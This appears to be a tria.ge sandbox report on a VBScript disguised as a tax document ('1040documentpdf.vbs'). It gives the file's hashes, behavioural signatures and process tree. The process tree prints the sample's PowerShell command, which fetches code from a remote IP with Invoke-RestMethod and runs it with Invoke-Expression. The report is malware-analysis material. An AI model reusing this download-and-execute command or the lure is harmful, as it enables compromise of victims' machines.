Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05/03/2024, 20:39
Static task
static1
Behavioral task
behavioral1
Sample
1040documentpdf.vbs
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
1040documentpdf.vbs
Resource
win10v2004-20240226-en
11 signatures
150 seconds
General
-
Target
1040documentpdf.vbs
-
Size
5KB
-
MD5
e02b999dc0c9c4bba51b28c6e733055a
-
SHA1
5eb9ebe7b853dc4bb3167f7d935ee9b62ab9fbb0
-
SHA256
4d86f191c4d7a5684116b671618669ec2bdd6bc08337fa2573c773386a14b2df
-
SHA512
5713f924b7d88072b1bbf61089802f4ffddcb84c431cf9caa0ff02330e6070fe27259aba2e7455e2b113ed3740c8fea579199c5fc8242f10cb792fb2b35312d6
-
SSDEEP
96:wwUEmyDTEBzylU+/V9rkcQ3tZUHg4KRZZoPC8Wuo9d3uV0I:wwU0TEBzj+/V9g/tZUHg4KR/oa8Wuo9u
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1296 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2156 wrote to memory of 1296 2156 WScript.exe 28 PID 2156 wrote to memory of 1296 2156 WScript.exe 28 PID 2156 wrote to memory of 1296 2156 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1040documentpdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '45.140.146.2:443/ivpzhehw')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-